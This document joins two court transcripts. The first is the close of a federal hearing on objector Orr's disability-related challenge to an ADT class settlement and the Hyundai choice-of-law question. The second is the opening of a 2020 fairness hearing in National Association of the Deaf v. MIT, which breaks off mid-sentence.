13  that's so.  And you can explain as much as you like, but that is

14  a yes-or-no question.

15  **MR. LEVINE:**  I'm trying to find the right place, so we have

16  the exact language.

17  **THE COURT:**  Sure.  I'll read it to you (As read):

18  "It is true that plaintiffs in the actions did not

19  allege such claims unique to disabled ADT customers,

20  but by the same token, the proposed settlement does

21  not purport to compensate settlement class members

22  for such claims, nor does the proposed settlement

23  class release (which is limited to claims 'predicated

24  upon the facts alleged in the actions') purport to

25  release or otherwise prejudice those claims..."

1   Citation.
2         "...nor could the release extend to such claims as
3         matter of due process."
4   My question is:  Does ADT agree with those statements?
5   MR. LEVINE:  Yes, Your Honor.  Then, if I could explain.
6   THE COURT:  Sure.
7         MR. LEVINE:  The reference that's key there is the "claims
8   unique to disabled ADT customers," which is describing, I
9   believe, what is in the prior paragraph of Page 5, which is that
10  the Orr objection appears (As read):
11        "...animated by an overall conviction that the
12        actions and settlement did not address purported
13        claims premised on allegations of discrimination
14        against or misrepresentations made to disabled
15        persons."
16        THE COURT:  Exactly.  And that's what I understand you and I
17  to be talking about now, which is the question of whether ADT
18  made different representations to disabled potential customers
19  than they made to everybody else.
20        MR. LEVINE:  Right.
21        THE COURT:  And you've said they didn't do that.  And you
22  don't think these materials show that.  But if it's, in fact,
23  the case that those claims are not released by the settlement,
24  then coming to a definitive answer to that question may be less
25  important.

1         MR. LEVINE:  Right.  I think you're right, Your Honor.  And
2   I agree.  But if I could just explain, because the
3   differentiation's important.
4         THE COURT:  Sure.
5         MR. LEVINE:  The claims that are not released are claims
6   that there was some -- something -- some different
7   representations made to people who were handicapped than not
8   handicapped, or that they're targeted or discriminated against.
9         What is released are claims that ADT made misrepresentations
10  or omissions with respect to the wireless signals between the
11  peripheral sensors and the alarm panels that -- to people who
12  include people who are handicapped and not handicapped.
13        In other words, the fact that someone is a handicapped
14  person doesn't give them an exclusion from the release.
15        THE COURT:  Right.
16        MR. LEVINE:  That's the point, Your Honor.
17        THE COURT:  I got it.
18        Mr. Balint?
19        MR. BALINT:  (Inaudible)
20        THE COURT:  Okay.  Mr. Winick, do you want to say anything
21  further?
22        MR. BALINT:  No, Your Honor.  That was precisely the point I
23  want to draw.
24        THE COURT:  I was addressing myself to Mr. Winick.
25        MR. BALINT:  Oh, I'm sorry.

1    **THE COURT:** Yeah.

2        **MR. WINICK:** There are several points I would like to

3    address, based on the comments that you have received from

4    defense counsel and plaintiffs' counsel.

5        But let me take this last point first.

6        It simply does not make any sense. When you look to the

7    complaint, the complaint is talking about all representations --

8        **THE COURT:** The release point doesn't make any sense?

9        **MR. WINICK:** No, the release point that somehow handicapped

10   members of this class, that the claims are somehow not released.

11   And it could -- it could actually completely invalidate any

12   potential claim that any of these handicapped persons would

13   make, because the statute of limitations wouldn't have been

14   tolled.

15       What I have been hearing -- and I heard this --

16       **THE COURT:** But that's of equitable concern to the Court

17   only if the complaint could fairly be read to have included such

18   claims in the first place.

19       Do you think it does?

20       **MR. WINICK:** Absolutely. The -- there's eleven different

21   complaints that have been filed --

22       **THE COURT:** Mr. Winick, let me say to you a version of what

23   I have said to counsel for the parties.

24       I am not sure that -- and in fact, I strongly doubt -- that

25   the best way to resolve these issues is in an extemporaneous

1    discussion at hearing. And so I think I would like to hear from

2    everybody, including you, whether any of these issues require

3    further briefing. I'm not requiring it. I'm not saying I won't

4    at a later date, when I get off the bench and think about it,

5    but I'm not requiring it now.

6        I'm just asking whether anybody wants a chance to brief any

7    of these issues further so that some of these things can be

8    narrowed down, and the playing field of dispute can be a little

9    narrower.

10       Now, it may be, as counsel for both of the sides in the

11   dispute have indicated: Hey, this is so obvious, we don't even

12   need to file some briefs. You go back and think about this;

13   you'll overrule this objection.

14       You might feel: You know what? Mr. Orr's submission

15   combined with my in-court performance is all the Court needs to

16   reject this $16 million settlement.

17       But if anybody in the room feels that further briefing would

18   be helpful, let's set that schedule. Because honestly, I have

19   to say this discussion is interesting to me, but it doesn't seem

20   to be headed toward a quick resolution because, for example,

21   there are disputes about the inferences to be drawn from

22   isolated pages of marketing materials. And I don't have those

23   in front of me. But I'm not sure, if I did -- anyway.

24       And, and I -- and I apologize if this seems a little hasty.

25   Maybe in ten minutes, I'll say: Oh, that *Kia* thing took a less

1   time than I thought. Let's go back and talk about the

2   objections some more.

3      **MR. WINICK:** Right.

4      **THE COURT:** But I'm just not sure that we're going to do

5   this issue justice today.

6      I'm going to ask you to pause for a second, and let me ask

7   first Mr. Levine, and then I'll ask someone from the plaintiffs'

8   side.

9      Mr. Levine, do you think that further briefing of any kind

10  might be helpful on this issue?

11     And I appreciate, by the way, that from ADT's standpoint and

12  the plaintiffs' standpoint, you've been to court a few times.

13  Today was final approval. You're experiencing the expectations

14  delta that comes with a last-minute wrinkle. So we can all just

15  acknowledge that, and let that go. That train left the station.

16  Okay?

17     So now we are living in a new world. Do you want the chance

18  to say anything in writing on any of this?

19     **MR. LEVINE:** You know, I think, given the discussion that we

20  just had about what's included, what's released, and what's not

21  released, I think it was pretty clear, and I don't think there's

22  anything I could do to make it clearer in writing.

23     But of course, we will submit something, you know, if

24  Your Honor thinks it would be helpful.

25     **THE COURT:** Here are all the questions that I have. Maybe

1   I'm betraying my ignorance.

2      What is it that needs to be shown in an objection before I

3   have to take it seriously? Really.

4      The evidence that was attached to Mr. Orr's submission is

5   being challenged. Okay. Well, is that an issue I need to deal

6   with?

7      This is just not a situation that I have found myself in

8   before, nor that I expected to find myself in today.

9      Let's say that -- you know, whose burden of proof is it?

10  What's the burden to take these typicality and commonality and

11  fair, reasonable or adequate questions?

12     And, and I -- and I know that in the brief at Docket

13  No. 139, the plaintiffs have addressed many of these issues. So

14  it could be that Mr. Chavez will tell me in just a moment:

15  Judge, if you just read that brief, you'll see we addressed all

16  this already.

17     **MR. CHAVEZ:** Your Honor, just to answer your question on the

18  burden, the law is clear that the objector has the burden of

19  demonstrating at this stage that the settlement is not fair,

20  reasonable and adequate.

21     We believe we have adequately demonstrated that the

22  settlement satisfies that standard, and should be approved. We

23  do believe that we have briefed the issues that are of concern

24  to the Court.

25     Rather than burden the Court with any additional briefing,

1   our inclination would be to stand on the record before the
2   Court.  Nevertheless, if the Court would like us to address
3   something additional, we will do so.
4       I do want to say, though, that today, there was a
5   presentation of factual information which would obviously
6   concern any judge.  However, ultimately, at bottom, the question
7   is whether the claims that are being articulated, asserted,
8   notwithstanding whether or not they have any legal basis,
9   whether they're released by this settlement.
10      And I think the clear answer to that is:  No.  Those claims
11  are outside the scope of the release.  They need not detain the
12  Court.
13      There's no justification for rejecting this settlement,
14  based upon what are essentially hypothetical claims that have
15  never been raised by Mr. Orr or anyone else in any litigation,
16  and which, on their face, are dubious.
17      So when you look at the scope of the release, when you look
18  at the representations of the parties before the Court, there
19  isn't any dispute that they're outside the scope of the release.
20  And I don't understand the motivation of Mr. Orr -- or
21  Mr. Winick, rather -- to make the assertion that they are.
22  Because that would seem to preclude the claims, unnecessarily.
23  And that's not to the benefit of anybody who may have a claim
24  based upon a handicap, a disability.
25      But those claims are not part of our case, they weren't

1   litigated.  They're not in the complaint.  They were not
2   released.
3       THE COURT:  Yeah.  Mr. Winick, last words.
4       MR. WINICK:  I can't understand what Mr. Chavez is saying,
5   at all.  You have a -- look to the eleven class-action
6   complaints.  They are all talking about unfair business
7   practices, false advertising, fraud.
8       Whether they -- there is no distinction made in the class
9   with respect to whether you were handicapped, non-handicapped.
10  It doesn't matter.  This isn't -- we're not bringing a
11  handicapped claim.  We're claiming we are a --
12      THE COURT:  Well, that doesn't mean that the release
13  releases any misrepresentation claim that occurred at all during
14  the class period, on any topic, does?
15      MR. WINICK:  Well, look to the release.  At Page 84-A, it
16  releases all unknown or unanticipated claims predicated upon the
17  facts alleged in the actions.
18      There's no way you can look at any of these class action
19  complaints (Indicating) and not see that we fit right in it.
20  The only difference is they didn't distinguish --
21      THE COURT:  Well, hold on just a moment, though.
22      You identified for me a moment ago -- and I'll go look at
23  the specific page references -- advertisements that you said
24  were directed specifically at handicapped persons that were
25  different from the representations that were directed to other

| 1 | persons. |
|---|---|
| 2 | Correct? |
| 3 | Did you do that? |
| 4 | **MR. WINICK:**  The focus -- the -- what I was saying was that |
| 5 | the cost -- yes, there were advertising directly to handicapped. |
| 6 | But all advertisements are released by this thing. |
| 7 | Now, if you were to say, which is what -- I received a call |
| 8 | from class counsel, suggesting that the lawsuits do not include |
| 9 | any of the claims that could be brought by handicapped.  And |
| 10 | they said:  So long as -- if we can get that acknowledgment from |
| 11 | the defense, would you agree to that? |
| 12 | And I said:  Well, wait a second.  If the lawsuits which |
| 13 | tolled the statute of limitations for all class members had |
| 14 | nothing to do with the handicapped, any of the representations |
| 15 | made to the handicapped, guess what?  They're all out of court. |
| 16 | The statute of limitation has tolled for all of them. |
| 17 | And it's -- the simple question for the Court to ask is: |
| 18 | Are the claims that I have articulated today about |
| 19 | representations to class members of -- of the subclass of |
| 20 | handicaps, do they fall within the eleven complaints? |
| 21 | (Indicating). |
| 22 | And the answer is obviously:  Yes. |
| 23 | **THE COURT:**  Okay.  Let's unpack that a little. |
| 24 | **MR. WINICK:**  Pardon me? |
| 25 | **THE COURT:**  Let's unpack that a little. |

| 1 | **MR. WINICK:**  Okay. |
|---|---|
| 2 | **THE COURT:**  In my mind, you are drawing a couple of |
| 3 | distinctions.  One of them is -- we'll do the easy part first. |
| 4 | One of them is representations that are made only to |
| 5 | disabled persons. |
| 6 | Do you prefer the term "disabled" or "handicapped"? |
| 7 | **MR. WINICK:**  I asked the same question to my client, and he |
| 8 | said:  Either one.  Just at one point in time at the beginning, |
| 9 | say that you'll use -- refer to both. |
| 10 | **THE COURT:**  Either one is the answer.  Fine. |
| 11 | **MR. WINICK:**  (Nods head) |
| 12 | **THE COURT:**  That there are representations that are made to |
| 13 | disabled potential customers, or customers, that are not made to |
| 14 | other people. |
| 15 | As to those representations, the parties have told me that |
| 16 | they do not believe that such claims are released.  And I think |
| 17 | that Mr. Levine's client would have a very difficult time, now |
| 18 | that this is on the record, taking the position in a court of |
| 19 | law that such claims were released.  Because he just told a |
| 20 | federal judge that they weren't. |
| 21 | Now, your response to that is:  Well, um, there's nothing |
| 22 | different about -- you know, my clients have been counting on |
| 23 | *American Pipe* tolling.  And if you read the complaint, the |
| 24 | complaint will -- if you read the complaint, Judge, you -- |
| 25 | meaning me -- will conclude that any of those misrepresentations |

1  actually were the subject of these complaints.  So that release

2  doesn't do me any good.

3      Is that one argument that you are making?

4      **MR. WINICK:**  That would be one argument I would make.

5      **THE COURT:**  Okay.  I don't need any briefing on that.  I can

6  just go into chambers and read the complaint, and make that

7  decision, myself.

8      The second category of argument it seems to me is:  The

9  damages suffered by my clients, my disabled clients, are greater

10 than the damages suffered by non-disabled clients, because

11 disabled people were charged a lot more money for the same

12 services than non-disabled clients of ADT.

13     So even if the Court concludes, as I preliminarily have,

14 that this settlement amount is fair, reasonable and adequate,

15 given the assumptions that the Court has made about the amounts

16 of money at issue, with regard to handicapped people, those

17 assumptions are wrong.  Very wrong.  And so even if the

18 representations are the same as to this category of people, the

19 compensation is inadequate.

20     And I see that as being your other main argument.  How am I

21 doing?

22     **MR. WINICK:**  You're doing well.  You're doing well.  And --

23     **THE COURT:**  Good to know.

24     So, so now my question for you is:  If I go and I read these

25 materials to which you have pointed my attention, I hear from

1  you and Mr. Levine that I will quickly conclude either that you

2  have a point, or that you don't.

3      Mr. Levine seemed confident that I could read these few

4  pages and conclude that, in fact, there wasn't a big difference

5  in the fees charged by ADT.  Are you equally confident that I

6  will conclude that there was a big difference?

7      **MR. WINICK:**  The evidence that we submitted is not what I

8  would expect a plaintiff to have submitted at a trial.  We --

9      **THE COURT:**  But it's the evidence I have on the day the

10 settlement came before the Court for final approval.  And if I

11 do invite further briefing, it will not be for the purposes of

12 supplementing the factual record.

13     This is -- this is a case as to which I feel confident there

14 has not been a shortage of due process, or an inadequate

15 demonstration on the part of the Court that it is concerned for

16 the rights of the class.

17     So my question is:  If I look at what's in the record just

18 until today, are you just as confident that I'll think:  ADT

19 charges a lot more money to disabled customers, as Mr. Levine

20 was confident that they didn't do that?

21     **MR. WINICK:**  I don't think that you're going to be able to

22 reach a crystal-clear conclusion, based on the review, one way

23 or the other.

24     But I do want to add that the -- the party that I think

25 should know this answer, the party who should not have actually

1    said:  We don't know the answers to these questions, let's turn
2    it to the defense, is class counsel (Indicating).
3        Class counsel's representing us.  They should know these
4    things.  They've never sifted through this.
5        So the fact is I don't think that you're going to be able to
6    look at this and say, you know:  Objector Orr's evidence is
7    perfect here.  And I don't think you are going to look at it and
8    say:  I believe ADT.
9        I think you're going to be -- you're going to say:  Maybe
10   this was enough to survive a motion to dismiss, but it's --
11   you're going to have to do some discovery on this during the
12   case.
13       And class counsel should have done that.
14       **THE COURT:**  All right.  Here's where we are.  It's 3:08
15   p.m..  We still haven't talked about Judge Ikuta's order in the
16   *Hyundai and Kia Litigation*, which is a topic I need to address.
17   I'm happy to hear a few more words from anybody if they have it
18   on this topic of the objection.
19       But let me tell you what I'm going to do, unless you tell me
20   to do something else.  I'm going to wait until Ms. Ball, who is
21   a fantastic court reporter, to give me an accurate transcript of
22   your remarks, so I don't miss anything, and I don't have to rely
23   only on my notes.  And then I'm going to pull from the record
24   the various pages that Mr. Winick has identified.
25       Mr. Winick, Mr. Levine earlier in the hearing offered me

1    what I think is a copy, a complete copy of your client's
2    contract with ADT.  If I'm right in what I think he was offering
3    me, provided he shows it to you first for your review, do you
4    have any objection to his lodging a copy with the Court?
5        **MR. WINICK:**  No, I don't believe so.
6        **THE COURT:**  Okay.  Is that what you are offering me,
7    Mr. Levine?
8        **MR. LEVINE:**  Yes, sir.
9        **THE COURT:**  I accept your offer.  So, I will look at those
10   materials.  If I think that the Court needs further briefing,
11   I'll tell you.  My goal would be not to need further briefing on
12   this topic.  But I think I understand the parties' arguments.
13       Anything further with regard to Mr. Orr's objection?
14       **MR. CHAVEZ:**  No, Your Honor, thank you.
15       **MR. LEVINE:**  No, Your Honor.
16       **THE COURT:**  Mr. Winick, let me say something.  It's in part
17   for your benefit, but it's also for the benefit of everyone else
18   if in the courtroom, including the member of the public who is
19   sitting there.
20       I don't know what's going to happen with this objection.
21   But I admire you for taking this case on pro bono after getting
22   a phone call from an organization you trust, even though you
23   didn't know anything about the person they were sending to you.
24       When I was in private practice, I was the co-chair of my
25   firm's pro bono committee.  Twice -- I did a lot of different

1  cases.  But on two separate occasions, I got a call, once from

2  Bay Area Legal Aid, once from Marin County Legal Aid.  And they

3  said: Would you please take this case?

4     And I said in one case: I don't do tax.  And in the other

5  case I said: I don't do bankruptcy.

6     And at both times, they said: But so-and-so -- a different

7  partner at a different law firm -- said you will take anything.

8  And we can't get anyone else to take this case.

9     And in both cases I took the case.  I found a bankruptcy

10 lawyer to help me; I found a tax lawyer to help me.  And both of

11 those cases were very satisfying.

12    And, anyway, it's good to know that in San Francisco,

13 because I think what you did is emblematic of the way a lot of

14 people in this town practice, that if you get this call, you

15 take it.

16    So I didn't really understand Mr. Orr's objection, and I

17 don't know how it's going to turn out.  But thanks to you, it

18 got its day in court.

19    **MR. WINICK:**  Thank you, Your Honor.

20    **THE COURT:**  All right.  Let's turn to the other question

21 that was on my mind, which is:  *In re Hyundai and Kia Fuel*

22 *Economy Litigation,* Case No. 15-56014, Ninth Circuit,

23 January 23rd, 2018.

24    Here's my question.  The parties have said -- the parties,

25 appropriately, gave me a copy of the case when it came out.  And

1  they've said:  The Court doesn't need to worry about it because

2  we don't have the law of a lot of different states at issue.  We

3  just have Florida law.

4     So I can just approve the settlement.

5     I'm not sure that's accurate.  The reason I'm not sure it's

6  accurate is because in her order, Judge Ikuta says as follows:

7        "In determining whether dominance is defeated by

8        variations in state law we proceed through several

9        steps."

10    She cites *Mazza* for that proposition.

11       "First, the class action proponent must establish

12       that the forum state's substantive law may be

13       constitutionally applied to the claims of a

14       nationwide class.  If the forum state's law meets

15       this requirement, the District Court must use the

16       forum state's choice of law rules to determine

17       whether the forum state's law or the law of multiple

18       states apply to the claims."

19    Then she goes on.  It's the "Then she goes on" part that I

20 think you addressed in your brief.

21    **MR. BALINT:**  Right.

22    **THE COURT:**  And my question is:  Do we need to do Steps 1

23 and 2?

24    **MR. BALINT:**  Right.  I don't think that's the intent of this

25 decision, Your Honor.  I don't think -- *Hyundai* is causing quite

1    a stir because the Court extended analysis usually done in a
2    litigation context or litigation class to a settlement class.
3        THE COURT:  Yes.
4        MR. BALINT:  But I don't think that the majority in *Hyundai*
5    altered the sort of fundamental burdens with respect to
6    assessing the need to conduct a choice-of-law analysis.
7        And the first step would be to determine whether or not
8    there is in fact a conflict of a law that requires the Court to
9    consider:  Okay, which law am I going to apply?
10       In the *Hyundai* case -- and we went back and pulled -- we
11   cited to Your Honor, and I also have a copy -- we actually
12   pulled the motion in support of certification of a settlement
13   class.  And in that case, they had alleged, you know, common-law
14   claims of fraud, negligent misrepresentation, unjust enrichment,
15   California state claims.
16       But the proposal was that:  We're going settle these
17   nationwide class claims, premised on these claims which
18   necessarily, you know, involved a multi-state application of the
19   law of many different states.
20       And in that case, you had an objecting class who came in, in
21   response, and said:  No, we object to that because we have a
22   better law in Virginia and a number of our class members have
23   contracts that specifically say Virginia law applies.
24       And so -- and, and she pointed out that the District Court,
25   when considering certification at the litigation stage, had

1    expressed doubts about the ability to certify a litigation class
2    because of all the different multi-state law that has to apply.
3        So in that situation, I think that the analysis -- that it
4    made sense to say even in a settlement context, you have to
5    consider whether there's a genuine choice-of-law issue
6    presented.
7        THE COURT:  Now when you say in that context, you mean when
8    somebody brings it to the Court's attention at one of these
9    procedure stages you have identified?
10       MR. BALINT:  I'm sorry, Your Honor; I didn't catch all that.
11       THE COURT:  You said in that context --
12       MR. BALINT:  In that context, correct.
13       THE COURT:  And my question is when you say "in that
14   context," do you mean when somebody raises the issue in
15   certification briefing?
16       MR. BALINT:  Yes, I think that.
17       THE COURT:  You do not think that *Hyundai* imposes any
18   independent obligation on a District Court to answer these
19   questions unless somebody raises it, either by way of objection
20   or during class certification briefing?
21       MR. BALINT:  I think --
22       THE COURT:  Because I will say I am also a reader of the
23   class action periodicals, and I'm quite aware of the extent to
24   which the bar regards *Hyundai* as a massive change.
25       And my question for you is:  If it was -- the obligation was

1  as limited as you are saying, why would it be such a sea change?

2  Because you and I both know it doesn't come up that much.

3  **MR. BALINT:**  Oh, no.  What I'm saying is the obligation is

4  to assess whether or not there's a potential conflict of law

5  that requires a choice-of-law analysis.

6  **THE COURT:**  Yes.

7  **MR. BALINT:**  So for example, Your Honor, if you had one

8  state law apply nationwide -- that's what's here --

9  **THE COURT:**  Yes.

10  **MR. BALINT:**  -- basically, right?  Then, do you have an

11  obligation then to conduct a choice-of-law determination,

12  analysis in that context?  Or do you simply determine whether

13  it's permissible to apply that one state's law to the class as a

14  whole?  And I think that can be done consistently with *Hyundai*.

15  That's what we tried to point out in our brief.

16      Here, you know, we consistently, consistently asserted our

17  claims, our nationwide claims based on the Florida statute.

18  That is the only nationwide class that we sought to certify.

19  And that's what we had moved to certify in *Baker* when the

20  parties went into mediation.

21      So at that point, ADT is facing the prospect of a nationwide

22  class asserting these claims under the Florida statute.  And

23  that's the claims they settled.  They reached on a settlement of

24  those nationwide claims, and other claims that are -- could be

25  asserted, whether they were asserted or not, based on the same

1  factual predicate.

2      I don't think, Your Honor, that *Hyundai* requires, for

3  example, the plaintiff to come in and disprove the existence of

4  conflicts.  I think if the defendant raised that issue or an

5  objector raised that issue, then the Court should assess whether

6  or not it needs to do a choice-of-law analysis.  And that's what

7  the Court was criticized for not doing in *Hyundai*, but I don't

8  think the present scenario presents the Court with that

9  obligation.

10      I would also point out, Your Honor, that we asserted, even

11  in the amended -- second amended complaint here in this

12  Edenborough case, we specifically amended to make sure that we

13  were asserting the nationwide class to support a nationwide

14  resolution, and we asserted the California claims, but only on

15  behalf of the California subclass.

16      So, and our position, our contention is those claims are

17  completely consistent.  A California resident can assert a claim

18  under the Florida statute and under the California statute.  So

19  it's not a situation where they're mutually exclusive.

20  **THE COURT:**  Good enough.

21  **MR. BALINT:**  Thank you, Your Honor.

22  **THE COURT:**  I was going to ask for further briefing.  Now

23  I'm not sure I will.  It could be that I'll -- that I'll take a

24  few steps down the path that you have just described, and that

25  you also describe in your brief.  And that is to satisfy myself

1   that what you say in the brief is right -- and I assume it is
2   right -- that anybody in the country can make a claim under this
3   Florida statute. And those are the only claims -- you know,
4   you're resting your settlement here on that statute. And
5   that -- and that if I reach that conclusion, there really are no
6   constitutional or due-process issues left. I don't have to
7   worry about *Hyundai* and I can just move on.
8       **MR. BALINT:** Thank you.
9       **THE COURT:** If I don't -- if I feel like I need something
10  further, I'll ask for it. But I -- again, my goal is to rest on
11  the many briefs that have already been filed in the case.
12      **MR. BALINT:** Thank you, Your Honor.
13      **THE COURT:** Further matters for the Court's attention?
14      (Off-the-Record discussion between counsel)
15      **MR. CHAVEZ:** Unless the Court has any further questions,
16  we're prepared to submit, Your Honor.
17      **THE COURT:** Mr. Levine, anything further?
18      **MR. LEVINE:** No, Your Honor. We will file the full Orr
19  contract by ECF either late today or tomorrow morning. I have a
20  copy here, if you want an extra copy.
21      **THE COURT:** I would actually appreciate getting a paper copy
22  now, to speed up my review. But you will need to file a copy on
23  the public docket.
24      (Document handed up to the Court)
25      **MR. LEVINE:** The contract --

1       **THE COURT:** Oh, yes, Mr. Orr. O-R-R.
2       **MR. LEVINE:** Right. The contract between the Orrs and ADT.
3       (The Court examines document)
4       (Off-the-Record discussion between the Court and Clerk)
5       **THE COURT:** Oh, yes, I'm going to provide that the -- that
6   the contract be filed under seal, because part of it contains
7   personal identifying information of Mr. Orr and a couple of his
8   family members.
9       **MR. LEVINE:** Sure.
10      **THE COURT:** Thank you all. This motion is under submission.
11      **MR. ZIMMERMAN:** Thank you.
12      **MR. LEVINE:** Thank you, Your Honor.
13      **THE CLERK:** All rise.
14      (Proceedings concluded)
15
16
17
18
19
20
21
22
23
24
25

1

2

3

4                        **CERTIFICATE OF REPORTER**

5              I, BELLE BALL, Official Reporter for the United States

6    Court, Northern District of California, hereby certify that the

7    foregoing is a correct transcript from the record of proceedings

8    in the above-entitled matter.

9              *Belle Ball*

10

11                        /s/ Belle Ball

12                   Belle Ball, CSR 8785, CRR, RDR

13                      Monday, February 12, 2018

14

15

16

17

18

19

20

21

22

23

24

25



```
 1                  UNITED STATES DISTRICT COURT
                      DISTRICT OF MASSACHUSETTS
 2

 3     --------------------------------X
       NATIONAL ASSOCIATION OF THE DEAF, :
 4     on behalf of its members,          :
       C. WAYNE DORE, CHRISTY SMITH,      :
 5     LEE NETTLES, on behalf of          :
       themselves and a proposed class    :
 6     of similarly situated persons      :
       defined below,                     : Civil Action No.
 7                                         : 3:15-cv-30024-KAR
                 Plaintiffs,               :
 8                                         :
            v.                             :
 9                                         :
       MASSACHUSETTS INSTITUTE OF          :
10     TECHNOLOGY,                         :
                                           :
11               Defendant.                :
       --------------------------------X
12

13

14

15

16

17         BEFORE THE HONORABLE KATHERINE A. ROBERTSON,
                         MAGISTRATE JUDGE
18
             FAIRNESS HEARING BY VIDEO CONFERENCE
19                  Tuesday, July 14, 2020
                         10:07 a.m.
20

21     United States Courthouse
       Hampshire Courtroom
22     300 State Street
       Springfield, Massachusetts
23
       Robert W. Paschal, RMR, CRR
24     Official Court Reporter
       rwp.reporter@gmail.com
25
```

```
1                    A P P E A R A N C E S

2

3    On behalf of Plaintiffs:

4         COHEN MILSTEIN SELLERS & TOLL, PLLC
          BY:   JOSEPH M. SELLERS and SHAYLYN COCHRAN
5         1100 New York Ave NW, Suite 500
          Washington, DC  20005
6         (202) 408-4600
          jsellers@cohenmilstein.com
7         scochran@cohenmilstein.com

8         NATION ASSOCIATION OF THE DEAF
          BY:   HOWARD ROSENBLUM
9         8630 Fenton Street, Suite 820
          Silver Spring, MD  20910
10        (301) 587-1788
          howard.rosenblum@nad.org
11
          CIVIL RIGHTS EDUCATION AND ENFORCEMENT CENTER
12        BY:   AMY F. ROBERTSON
          1245 E. Colfax Ave, Suite 400
13        Denver, CO  80218
          (303) 757-7901
14        arobertson@creeclaw.org

15        DISABILITY LAW CENTER, INC.
          BY:   THOMAS P. MURPHY
16        32 Industrial Drive East
          Northampton, MA  01060
17        (413) 584-6524
          tmurphy@dlc-ma.org
18
          DISABILITY LAW CENTER
19        BY:   TATUM A. PRITCHARD
          11 Beacon Street, Suite 925
20        Boston, MA  02108
          (617) 723-8455
21        tpritchard@dlc-ma.org

22        DISABILITY RIGHTS EDUCATION & DEFENSE FUND
          BY:   CARLY A. MYERS
23        3075 Adeline Street, Suite 210
          Berkeley, CA  94703
24        (510) 644-2555
          cmyers@dredf.org
25
```

```
 1   On behalf of Defendant:

 2         GOODWIN PROCTER, LLP
           BY:   ROBERTO M. BRACERAS
 3         100 Northern Avenue
           Boston, MA   02210
 4         (617) 570-1895
           rbraceras@goodwinprocter.com
 5
           GOODWIN PROCTER, LLP
 6         BY:   WILLIAM M. JAY and ANDREW KIM
           1900 N. Street NW
 7         Washington, DC 20036
           (202) 346-4000
 8         wjay@goodwinlaw.com
           andrewkim@goodwinlaw.com
 9
           DAVIS WRIGHT TREMAINE, LLP
10         BY:   JANET GRUMER
           865 S. Figueroa Street, Suite 2400
11         Los Angeles, CA   90017
           (213) 633-6866
12         janetgrumer@dwt.com

13

14

15

16

17

18

19

20

21

22

23

24

25
```

```
 1                      P R O C E E D I N G S
 2              (In open court at 10:07 a.m.)
 3              THE DEPUTY CLERK:  In the matter of National
 4    Association of the Deaf, et al. versus Massachusetts
 5    Institute of Technology, Civil Action Number 15-30024.
 6              THE COURT:  So we have an American Sign Language
 7    interpreter here.  If at any point during this hearing,
 8    Mr. Interpreter, you have difficulty, please let us know,
 9    and we'll either slow down or, you know, redo part of the
10    hearing.  We want to make sure -- we do want to make sure
11    it's accessible.
12              Counsel, would you identify yourselves for the
13    record, and I will start with counsel for the plaintiffs.
14              MR. SELLERS:  Yes.  Good morning, Your Honor.
15    This is Joseph Sellers.  May I introduce first two of our --
16    two of our individual plaintiffs, Christy Smith, who is here
17    with us.
18              THE COURT:  Good morning.
19              MR. SELLERS:  And Lee Nettles, who is also with
20    us, in person.
21              THE COURT:  Yes.
22              MR. SELLERS:  Howard Rosenblum, who I know you've
23    seen before, serves both as counsel and as the head of the
24    Nation Association of the Deaf.
25              With me also -- I'm sorry -- Your Honor, is
```

1    co-counsel Amy Robertson from the Civil Rights Education and
2    Enforcement Center, Thomas Murphy and Tatum Pritchard from
3    the Disability Law Center, Carly Myers from the Disability
4    Rights Education and Defense Fund, and my colleague Shaylyn
5    Cochran from my firm.

6          THE COURT:  Okay.  And on behalf of the -- of MIT
7    this morning?

8          MR. BRACERAS:  Good morning, Your Honor.  Roberto
9    Braceras on behalf of MIT, and I'll follow Mr. Sellers' lead
10   and introduce our team on -- with me as well is Willie Jay,
11   my partner, and Andrew Kim, as well, Janet Grumer joining us
12   from the West Coast, and Anthony Moriello from MIT.  Good
13   morning, Your Honor.

14         THE COURT:  Good morning.

15         Before we go any further, I -- my -- one of my
16   staff members, Lizette Richards, who's a lawyer and one of
17   my law clerks, sent me a text message this morning with a
18   letter to the editor in a local newspaper.  And she said,
19   "Look, what a coincidence."

20         I wanted to read the first part of the letter
21   into the record this morning.  It's written by a small group
22   of people who they say have been gathering regularly to
23   partake in virtual worship services, I think, probably since
24   March of 2019.  And what they write is as follows:

25         "We write this not as a 'call out' letter, but as

1    a 'call in' letter.  We are asking all who care about
2    fostering cultures of inclusion to move virtual programming,
3    group calls, community meetings, and beyond to a platform
4    that is accessible to the deaf and hard of hearing
5    communities.

6              "The growing reliance on computer platforms for
7    social interactions given the constraints imposed on all of
8    us during the COVID-19 crisis, has seriously increased
9    barriers faced by many people.  The resulting isolation
10   experienced by those who cannot access online options is
11   real, profound, and life threatening."

12             The letter states so eloquently the importance of
13   the right and the need that the plaintiffs asserted in this
14   lawsuit and that the parties have worked jointly to address.
15   So I want to thank Ms. Richards for sending that along.  I
16   thought it was really important.

17             So this is, as you all know, the fairness
18   hearing.  We gave -- we gave an opportunity to -- it's also
19   a hearing on the plaintiffs' motion for an award of
20   attorneys' fees.  That is not opposed by MIT.

21             We gave -- we did receive, I would say, one -- an
22   objection that was substantive from one individual.  That
23   was Mr. Orr.  We provided Mr. Orr with call-in information.
24   He did indicate a desire to address the Court this morning
25   to supplement what he sent.  I -- he has limitations.  I

```
 1    don't know about the extent of his ability to participate,
 2    but we are going to give him the opportunity to speak to his
 3    objections to whatever extent he is able to do that.
 4              So, Mr. Orr?
 5              MR. ORR:   Yes.   Thank you, Your Honor, for the
 6    opportunity to participate.   First of all, Edward Orr wishes
 7    to thank Ms. Melissa Rivera who has made special
 8    arrangements for Edward Orr to appear, because of his
 9    physical handicaps.   I will state for the record that
10    because of my handicaps, I must sometimes utilize artificial
11    voice technology, so my participation will be limited to
12    only a few seconds or a minute.
13              Objector Orr stands by the objection as
14    submitted.   The objection was submitted with the intent of
15    making a constructive contribution.
16              Thank you very much.
17              THE COURT:   Thank you, Mr. Orr.
18              And I have -- I have, from both sides, a response
19    to Mr. Orr's objections, different responses from each side.
20    And I have as well gone back and re-read the consent decree
21    in light of the objections that Mr. Orr identified.   And I
22    think there are, in essence, three.
23              The first one is, you know, perhaps the most
24    important, because it -- what Mr. -- the point Mr. Orr is
25    making is that the settlement agreement, he says, does
```

1  not -- the consent decree, I should say -- does not require

2  MIT to post content online.  And he points out that a

3  response by Berkeley, by the University of Berkeley, was to

4  remove some content from the website.

5          So I did go back and look at the consent decree.

6  I think that, to the extent that a lawsuit like this one can

7  address the need that's identified by the plaintiffs to have

8  access, that the parties have addressed that concern in the

9  following ways; and that is, first, that in the consent

